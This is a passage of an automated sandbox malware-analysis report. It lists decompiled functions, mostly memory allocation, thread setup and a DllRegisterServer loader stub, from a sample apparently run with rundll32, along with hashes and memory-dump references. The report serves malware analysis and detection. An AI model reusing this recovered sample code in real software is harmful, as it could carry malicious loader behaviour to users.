                                                                                                            0x100052a9
                                                                                                            0x100052b4
                                                                                                            0x100052bf
                                                                                                            0x100052d2
                                                                                                            0x100052da
                                                                                                            0x10005304
                                                                                                            0x1000530c
                                                                                                            0x10006014
                                                                                                            0x1000601a
                                                                                                            0x10005312
                                                                                                            0x10005312
                                                                                                            0x10005318
                                                                                                            0x1000531b
                                                                                                            0x10005321
                                                                                                            0x10005324
                                                                                                            0x1000533f
                                                                                                            0x10005350
                                                                                                            0x10005361
                                                                                                            0x00000000
                                                                                                            0x10005367
                                                                                                            0x1000536c
                                                                                                            0x1000536f
                                                                                                            0x10005377
                                                                                                            0x1000537d
                                                                                                            0x10005392
                                                                                                            0x100053db
                                                                                                            0x100053f4
                                                                                                            0x10005409
                                                                                                            0x00000000
                                                                                                            0x1000540f
                                                                                                            0x1000540f
                                                                                                            0x10005434
                                                                                                            0x10005436
                                                                                                            0x10005444
                                                                                                            0x10005466
                                                                                                            0x1000546d
                                                                                                            0x10005477
                                                                                                            0x10005484
                                                                                                            0x10005488
                                                                                                            0x00000000
                                                                                                            0x1000548e
                                                                                                            0x1000548e
                                                                                                            0x100054b4
                                                                                                            0x100054cb
                                                                                                            0x00000000
                                                                                                            0x100054d1
                                                                                                            0x100054d4
                                                                                                            0x100054d8
                                                                                                            0x100054ec
                                                                                                            0x10005505
                                                                                                            0x00000000
                                                                                                            0x1000550b
                                                                                                            0x1000550b
                                                                                                            0x1000551b
                                                                                                            0x10005537
                                                                                                            0x10005542
                                                                                                            0x1000555f
                                                                                                            0x10005575
                                                                                                            0x10005579
                                                                                                            0x1000557d
                                                                                                            0x10005592
                                                                                                            0x10005594
                                                                                                            0x100056bc
                                                                                                            0x100056c2
                                                                                                            0x1000559a
                                                                                                            0x100055a5
                                                                                                            0x100055b0
                                                                                                            0x100055b4
                                                                                                            0x100055ba
                                                                                                            0x100055be
                                                                                                            0x100055c4
                                                                                                            0x100055c8
                                                                                                            0x100055cd
                                                                                                            0x100055d1
                                                                                                            0x1000563e
                                                                                                            0x10005642
                                                                                                            0x100055d3
                                                                                                            0x100055e1
                                                                                                            0x100055ec
                                                                                                            0x10005600
                                                                                                            0x10005600
                                                                                                            0x10005650
                                                                                                            0x10005654
                                                                                                            0x10005699
                                                                                                            0x10005656
                                                                                                            0x10005656
                                                                                                            0x10005686
                                                                                                            0x10005693
                                                                                                            0x10005693
                                                                                                            0x100056a3
                                                                                                            0x100056ac
                                                                                                            0x100056b0
                                                                                                            0x100056b0
                                                                                                            0x100056b0
                                                                                                            0x100056ba
                                                                                                            0x100056cf
                                                                                                            0x100056fb
                                                                                                            0x10005701
                                                                                                            0x10005706
                                                                                                            0x1000570c
                                                                                                            0x10005712
                                                                                                            0x10005724
                                                                                                            0x10005753
                                                                                                            0x10005757
                                                                                                            0x1000575c
                                                                                                            0x10005765
                                                                                                            0x10005770
                                                                                                            0x10005783
                                                                                                            0x10005788
                                                                                                            0x10005797
                                                                                                            0x1000579d
                                                                                                            0x100057a1
                                                                                                            0x100057b3
                                                                                                            0x100057cf
                                                                                                            0x100057d5
                                                                                                            0x100057dd
                                                                                                            0x100057f5
                                                                                                            0x100057fe
                                                                                                            0x10005803
                                                                                                            0x00000000
                                                                                                            0x10005809
                                                                                                            0x10005809
                                                                                                            0x10005814
                                                                                                            0x10005827
                                                                                                            0x1000582e
                                                                                                            0x10005845
                                                                                                            0x1000584d
                                                                                                            0x1000585d
                                                                                                            0x10005894
                                                                                                            0x100058c0
                                                                                                            0x100058c7
                                                                                                            0x100058cd
                                                                                                            0x100058e6
                                                                                                            0x10005907
                                                                                                            0x10005909
                                                                                                            0x1000590c
                                                                                                            0x10005910
                                                                                                            0x10005914
                                                                                                            0x10005a04
                                                                                                            0x10005a04
                                                                                                            0x10005a0a
                                                                                                            0x10005a34
                                                                                                            0x10005a38
                                                                                                            0x10005a3e
                                                                                                            0x10005a4f
                                                                                                            0x10005a72
                                                                                                            0x10005a78
                                                                                                            0x10005a80
                                                                                                            0x10005a89
                                                                                                            0x10005a99
                                                                                                            0x10005a9b
                                                                                                            0x10005ae8
                                                                                                            0x10005aeb
                                                                                                            0x10005af0
                                                                                                            0x10005afc
                                                                                                            0x10005b03
                                                                                                            0x10005b09
                                                                                                            0x10005b23
                                                                                                            0x10005b2c
                                                                                                            0x10005b2e
                                                                                                            0x10005b33
                                                                                                            0x10005b3a
                                                                                                            0x10005b41
                                                                                                            0x10005b44
                                                                                                            0x10005b47
                                                                                                            0x10005b4a
                                                                                                            0x10005b52
                                                                                                            0x10005b7d
                                                                                                            0x10005b80
                                                                                                            0x10005b86
                                                                                                            0x10005b8b
                                                                                                            0x10005b94
                                                                                                            0x10005b9f
                                                                                                            0x10005ba7
                                                                                                            0x10005bb8
                                                                                                            0x10005bd3
                                                                                                            0x10005bd8
                                                                                                            0x10005bdd
                                                                                                            0x10006008
                                                                                                            0x10006008
                                                                                                            0x10006009
                                                                                                            0x00000000
                                                                                                            0x10005be3
                                                                                                            0x10005be3
                                                                                                            0x10005bf5
                                                                                                            0x10005c07
                                                                                                            0x10005c27
                                                                                                            0x10005c47
                                                                                                            0x10005c4f
                                                                                                            0x10005c75
                                                                                                            0x10005c79
                                                                                                            0x10005c7f
                                                                                                            0x10005c85
                                                                                                            0x10005c90
                                                                                                            0x10005c94
                                                                                                            0x10005cbf
                                                                                                            0x10005ccf
                                                                                                            0x10005cec
                                                                                                            0x10005cf2
                                                                                                            0x10005cf8
                                                                                                            0x10005d08
                                                                                                            0x10005d13
                                                                                                            0x10005d23
                                                                                                            0x10005d36
                                                                                                            0x10005d70
                                                                                                            0x10005d72
                                                                                                            0x10005d74
                                                                                                            0x10005d7a
                                                                                                            0x10005d8e
                                                                                                            0x10005da9
                                                                                                            0x10005dd5
                                                                                                            0x10005dd8
                                                                                                            0x10005dde
                                                                                                            0x10005de3
                                                                                                            0x10005dec
                                                                                                            0x10005e05
                                                                                                            0x10005e13
                                                                                                            0x10005e1e
                                                                                                            0x10005e30
                                                                                                            0x10005e4e
                                                                                                            0x10005e4f
                                                                                                            0x10005e50
                                                                                                            0x10005e55
                                                                                                            0x10005e5a
                                                                                                            0x00000000
                                                                                                            0x10005e60
                                                                                                            0x10005e60
                                                                                                            0x10005e65
                                                                                                            0x10005e6b
                                                                                                            0x10005e8c
                                                                                                            0x10005e96
                                                                                                            0x10005ea2
                                                                                                            0x10005ea4
                                                                                                            0x10005eaa
                                                                                                            0x10005eba
                                                                                                            0x10005ebd
                                                                                                            0x10005ec1
                                                                                                            0x10005f58
                                                                                                            0x10005ec7
                                                                                                            0x10005ec7
                                                                                                            0x10005ee6
                                                                                                            0x10005f04
                                                                                                            0x10005f05
                                                                                                            0x10005f10
                                                                                                            0x10005f38
                                                                                                            0x10005f39
                                                                                                            0x10005f3e
                                                                                                            0x10005f4e
                                                                                                            0x10005f53
                                                                                                            0x10005f53
                                                                                                            0x10005f5f
                                                                                                            0x10005f79
                                                                                                            0x10005f86
                                                                                                            0x10005f87
                                                                                                            0x10005f8c
                                                                                                            0x10005f91
                                                                                                            0x00000000
                                                                                                            0x10005f93
                                                                                                            0x10005f93
                                                                                                            0x10005f98
                                                                                                            0x10005f9e
                                                                                                            0x10005fa4
                                                                                                            0x10005fc1
                                                                                                            0x10005fd5
                                                                                                            0x10005fd6
                                                                                                            0x10005fdb
                                                                                                            0x10005fe0
                                                                                                            0x00000000
                                                                                                            0x10005fe2
                                                                                                            0x10005fe2
                                                                                                            0x10005ffb
                                                                                                            0x10005ffc
                                                                                                            0x10006001
                                                                                                            0x10006006
                                                                                                            0x1000601d
                                                                                                            0x10006022
                                                                                                            0x10006026
                                                                                                            0x1000610e
                                                                                                            0x1000611d
                                                                                                            0x1000602c
                                                                                                            0x10006031
                                                                                                            0x100060a5
                                                                                                            0x100060aa
                                                                                                            0x100060b0
                                                                                                            0x100060c4
                                                                                                            0x100060d4
                                                                                                            0x10006101
                                                                                                            0x1000610c
                                                                                                            0x10006033
                                                                                                            0x10006033
                                                                                                            0x10006039
                                                                                                            0x1000603f
                                                                                                            0x10006045
                                                                                                            0x1000606d
                                                                                                            0x1000608f
                                                                                                            0x10006095
                                                                                                            0x100060a4
                                                                                                            0x100060a4
                                                                                                            0x10006031
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10006006
                                                                                                            0x10005fe0
                                                                                                            0x10005f91
                                                                                                            0x10005e5a
                                                                                                            0x10005a9d
                                                                                                            0x10005aa1
                                                                                                            0x10005aa8
                                                                                                            0x10005acc
                                                                                                            0x10005ad7
                                                                                                            0x10005ae7
                                                                                                            0x10005ae7
                                                                                                            0x1000591a
                                                                                                            0x1000591a
                                                                                                            0x10005920
                                                                                                            0x1000592b
                                                                                                            0x10005936
                                                                                                            0x10005943
                                                                                                            0x10005947
                                                                                                            0x10005957
                                                                                                            0x10005981
                                                                                                            0x10005989
                                                                                                            0x1000598d
                                                                                                            0x100059a0
                                                                                                            0x100059ae
                                                                                                            0x100059cb
                                                                                                            0x100059d2
                                                                                                            0x100059e7
                                                                                                            0x100059f1
                                                                                                            0x100059f3
                                                                                                            0x100059f8
                                                                                                            0x100059fc
                                                                                                            0x00000000
                                                                                                            0x10005a02
                                                                                                            0x10005a02
                                                                                                            0x00000000
                                                                                                            0x10005a02
                                                                                                            0x100059fc
                                                                                                            0x10005914
                                                                                                            0x10005803
                                                                                                            0x10005505
                                                                                                            0x100054cb
                                                                                                            0x10005488
                                                                                                            0x10005409
                                                                                                            0x10005361

                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 100056FB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 10005A72
                                                                                                            • memcpy.MSVCRT ref: 10005CEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1755227880-0
                                                                                                            • Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                                                            • Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
                                                                                                            • Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                                                            • Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100350EA Relevance: 4.6, APIs: 3, Instructions: 60threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E100350EA(intOrPtr __ecx, void* __eflags) {
				void* _t37;
				intOrPtr _t54;
				void* _t56;

				E10011BF0(0x1003a421, _t56);
				_push(__ecx);
				_t54 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E10035766(__ecx, __eflags); // executed
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				} else {
					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
				}
				_t37 = E100373B5();
				_t44 = _t37;
				_push(0x10035062);
				_t7 = _t44 + 0x1070; // 0x1070
				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t37 + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x40)) = 0;
				 *((intOrPtr*)(_t54 + 0x78)) = 0;
				 *((intOrPtr*)(_t54 + 0x60)) = 0;
				 *((intOrPtr*)(_t54 + 0x64)) = 0;
				 *((intOrPtr*)(_t54 + 0x50)) = 0;
				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
				 *((intOrPtr*)(_t54 + 0x84)) = 0;
				 *((intOrPtr*)(_t54 + 0x54)) = 0;
				 *((short*)(_t54 + 0x8e)) = 0;
				 *((short*)(_t54 + 0x8c)) = 0;
				 *((intOrPtr*)(_t54 + 0x44)) = 0;
				 *((intOrPtr*)(_t54 + 0x88)) = 0;
				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
				 *((intOrPtr*)(_t54 + 0x80)) = 0;
				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
				 *((intOrPtr*)(_t54 + 0x70)) = 0;
				 *((intOrPtr*)(_t54 + 0x90)) = 0;
				 *((intOrPtr*)(_t54 + 0x98)) = 0;
				 *((intOrPtr*)(_t54 + 0x58)) = 0;
				 *((intOrPtr*)(_t54 + 0x68)) = 0;
				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t54;
			}






                                                                                                            0x100350ef
                                                                                                            0x100350f4
                                                                                                            0x100350f7
                                                                                                            0x100350fa
                                                                                                            0x100350fd
                                                                                                            0x10035107
                                                                                                            0x1003510a
                                                                                                            0x10035110
                                                                                                            0x10035120
                                                                                                            0x10035112
                                                                                                            0x1003511b
                                                                                                            0x1003511b
                                                                                                            0x10035123
                                                                                                            0x10035128
                                                                                                            0x1003512a
                                                                                                            0x1003512f
                                                                                                            0x1003513a
                                                                                                            0x10035143
                                                                                                            0x1003514f
                                                                                                            0x10035152
                                                                                                            0x10035155
                                                                                                            0x10035158
                                                                                                            0x1003515b
                                                                                                            0x1003515e
                                                                                                            0x10035161
                                                                                                            0x10035164
                                                                                                            0x10035167
                                                                                                            0x1003516d
                                                                                                            0x10035170
                                                                                                            0x10035177
                                                                                                            0x1003517e
                                                                                                            0x10035181
                                                                                                            0x10035187
                                                                                                            0x1003518a
                                                                                                            0x10035190
                                                                                                            0x10035193
                                                                                                            0x10035196
                                                                                                            0x1003519c
                                                                                                            0x100351a2
                                                                                                            0x100351a5
                                                                                                            0x100351a9
                                                                                                            0x100351b7
                                                                                                            0x100351bf

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100350EF
                                                                                                              • Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B
                                                                                                            • GetCurrentThread.KERNEL32 ref: 1003513D
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10035146
                                                                                                              • Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentH_prologThread$_strlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1650857145-0
                                                                                                            • Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                                                            • Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
                                                                                                            • Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                                                            • Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005090 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 226 10005090-10005097 227 100050a0-100050ab call 10004780 226->227 228 10005099-1000509a ExitProcess 226->228 231 100050b0-100050b2 227->231
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10005090() {
				int _t1;

				_t1 =  *0x1004d408; // 0x30efcc0
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E10004780()))(); // executed
				return 0;
			}




                                                                                                            0x10005090
                                                                                                            0x10005097
                                                                                                            0x1000509a
                                                                                                            0x1000509a
                                                                                                            0x100050a0
                                                                                                            0x100050a5
                                                                                                            0x100050ae
                                                                                                            0x100050b2

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID: DllRegisterServer
                                                                                                            • API String ID: 621844428-1663957109
                                                                                                            • Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                                                            • Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
                                                                                                            • Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                                                            • Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001382A Relevance: 3.1, APIs: 2, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 232 1001382a-10013842 call 10012514 235 10013845-1001384d 232->235 236 10013844 232->236 237 100138b4-100138b6 235->237 238 1001384f-10013856 235->238 236->235 239 100138b8-100138be 237->239 240 100138dd 237->240 241 10013858-1001386a 238->241 242 1001389f-100138a1 238->242 239->240 245 100138c0-100138c9 call 10014676 239->245 243 100138df-100138e4 call 1001254f 240->243 241->242 246 1001386c-1001388f call 10013a38 call 1001437a call 100138d4 241->246 242->240 244 100138a3-100138b2 RtlAllocateHeap 242->244 244->237 245->235 254 100138cf 245->254 246->244 258 10013891-1001389c call 10011c50 246->258 254->243 258->242
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x10041e40);
				E10012514(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x1004f58c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E1001254F(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x10050a64 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x10050a50; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E10013A38(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E1001437A();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E100138D4();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E10011C50(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E10014676(_t31) != 0);
				goto L14;
			}









                                                                                                            0x1001382a
                                                                                                            0x1001382c
                                                                                                            0x10013831
                                                                                                            0x10013839
                                                                                                            0x1001383d
                                                                                                            0x10013842
                                                                                                            0x10013844
                                                                                                            0x10013844
                                                                                                            0x10013845
                                                                                                            0x10013845
                                                                                                            0x10013847
                                                                                                            0x1001384d
                                                                                                            0x100138b4
                                                                                                            0x100138b6
                                                                                                            0x100138dd
                                                                                                            0x100138dd
                                                                                                            0x100138df
                                                                                                            0x100138e4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100138b6
                                                                                                            0x10013856
                                                                                                            0x1001389f
                                                                                                            0x100138a1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100138a3
                                                                                                            0x100138ac
                                                                                                            0x100138b2
                                                                                                            0x00000000
                                                                                                            0x100138b2
                                                                                                            0x1001385b
                                                                                                            0x1001385e
                                                                                                            0x10013861
                                                                                                            0x10013864
                                                                                                            0x1001386a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001386e
                                                                                                            0x10013874
                                                                                                            0x10013877
                                                                                                            0x1001387e
                                                                                                            0x10013881
                                                                                                            0x10013885
                                                                                                            0x1001388a
                                                                                                            0x1001388f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10013897
                                                                                                            0x1001389c
                                                                                                            0x00000000
                                                                                                            0x100138c0
                                                                                                            0x100138c7
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 1001386E
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 4078605025-0
                                                                                                            • Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                                                            • Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
                                                                                                            • Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                                                            • Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100107C8 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 100107c8-100107d9 call 10012514 264 10010833-10010838 call 1001254f 261->264 265 100107db-100107e2 261->265 267 10010824 265->267 268 100107e4-100107fc call 10013a38 call 10013b9b 265->268 269 10010825-1001082d RtlFreeHeap 267->269 275 10010807-10010814 call 1001081b 268->275 276 100107fe-10010806 call 10013bc6 268->276 269->264 275->264 281 10010816-10010819 275->281 276->275 281->269
                                                                                                            C-Code - Quality: 18%
                                                                                                            			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _t9;
				intOrPtr _t12;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x10041d10);
				_t9 = E10012514(__ebx, __edi, __esi);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x10050a64 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E10013B9B(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E10013BC6();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E1001081B();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x10050a60); // executed
						}
					}
				}
				return E1001254F(_t9);
			}







                                                                                                            0x100107c8
                                                                                                            0x100107ca
                                                                                                            0x100107cf
                                                                                                            0x100107d4
                                                                                                            0x100107d9
                                                                                                            0x100107e2
                                                                                                            0x10010824
                                                                                                            0x00000000
                                                                                                            0x100107e4
                                                                                                            0x100107e6
                                                                                                            0x100107ec
                                                                                                            0x100107f1
                                                                                                            0x100107f7
                                                                                                            0x100107fc
                                                                                                            0x100107fe
                                                                                                            0x100107ff
                                                                                                            0x10010800
                                                                                                            0x10010806
                                                                                                            0x10010807
                                                                                                            0x1001080b
                                                                                                            0x10010814
                                                                                                            0x10010816
                                                                                                            0x10010825
                                                                                                            0x10010825
                                                                                                            0x1001082d
                                                                                                            0x1001082d
                                                                                                            0x10010814
                                                                                                            0x100107e2
                                                                                                            0x10010838

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 100107E6
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterFreeHeapSection__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3012239193-0
                                                                                                            • Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                                                            • Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
